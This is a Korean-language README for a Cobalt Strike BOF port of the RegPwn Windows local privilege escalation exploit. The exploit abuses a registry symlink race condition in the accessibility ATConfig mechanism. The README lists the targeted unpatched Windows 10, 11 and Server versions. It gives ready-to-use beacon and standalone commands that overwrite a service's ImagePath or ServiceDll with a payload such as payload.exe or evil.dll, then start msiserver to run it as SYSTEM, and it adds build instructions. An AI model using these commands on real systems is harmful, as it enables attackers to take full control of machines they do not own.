
MDSec의 RegPwn의 Bof
Cobalt Strike BOF 포트로, Filip Dragovic (@Wh04m1001) / MDSec ActiveBreach의 RegPwn 익스플로잇을 기반으로 합니다.
이는 원래 C# 익스플로잇을 대충 BOF로 재구현한 것입니다. 취약점 연구 및 익스플로잇에 대한 모든 공로는 Filip Dragovic과 MDSec에 있습니다.
Windows 접근성 ATConfig 메커니즘의 레지스트리 심볼릭 링크 경쟁 조건을 악용하여 일반 사용자 컨텍스트에서 보호된 HKLM 레지스트리 키에 임의의 값을 작성합니다 (로컬 권한 상승).
Windows 11 25H2/24H2, Windows 10 21H2 및 Windows Server 2016/2019/2022 2026년 3월 패치 이전을 대상으로 합니다.
경고: 이 익스플로잇은 경쟁 조건의 일부로 워크스테이션을 잠급니다.
msiserver (Windows Installer) 서비스의 ImagePath. 이 서비스는 SYSTEM으로 실행되며 일반 사용자가 시작할 수 있습니다.
스크립트 관리자에서 regpwn.cna를 로드한 후:
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath
익스플로잇이 성공한 후, 서비스를 시작하여 SYSTEM으로 실행합니다:
net start msiserver
x86_64-w64-mingw32-gcc (MinGW-w64 크로스 컴파일러)가 필요합니다.
make # BOF 빌드 (regpwn.x64.o)
make test # 독립 실행형 EXE 빌드 (regpwn.x64.exe)
make clean
x64 전용.